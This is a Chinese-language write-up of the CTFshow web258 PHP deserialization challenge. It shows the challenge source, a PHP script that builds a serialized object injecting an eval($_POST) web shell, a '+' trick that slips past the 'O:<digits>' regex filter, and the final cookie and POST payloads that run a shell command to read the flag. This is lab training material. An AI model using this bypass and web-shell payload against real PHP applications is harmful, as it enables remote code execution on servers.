CTFshow 反序列化 web258

目录


源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 21:38:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}




思路

相比上题来说多了一个正则来过滤if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){

我们先看一下反序列化的值

没有用到的我们都可以去掉

<?php

class ctfShowUser{
    public $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }

}

class backDoor{
    public $code = 'phpinfo();eval($_POST["kradress"]);';
    public function getInfo(){
        eval($this->code);
    }
}

// O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":1:{s:4:"code";s:35:"phpinfo();eval($_POST["kradress"]);";}}
echo serialize(new ctfShowUser());

这里我们只要在O后面的数字是int类型,表示类名的长度,只要加一个+就可以绕过正则了

<?php

class ctfShowUser{
    public $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }

}

class backDoor{
    public $code = 'phpinfo();eval($_POST["kradress"]);';
    public function getInfo(){
        eval($this->code);
    }
}



$a = serialize(new ctfShowUser());

$a = str_replace('O:', 'O:+', $a);

echo urlencode($a);

题解

get:?username=&password=
post:kradress=?><?=`tac f*`;
cookie:user=O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A35%3A%22phpinfo%28%29%3Beval%28%24_POST%5B%22kradress%22%5D%29%3B%22%3B%7D%7D

CTFshow 反序列化 web258


总结

水题

上一篇:ctfshow[摆烂杯]----一行代码


下一篇:[CISCN2019 华北赛区 Day1 Web2]ikun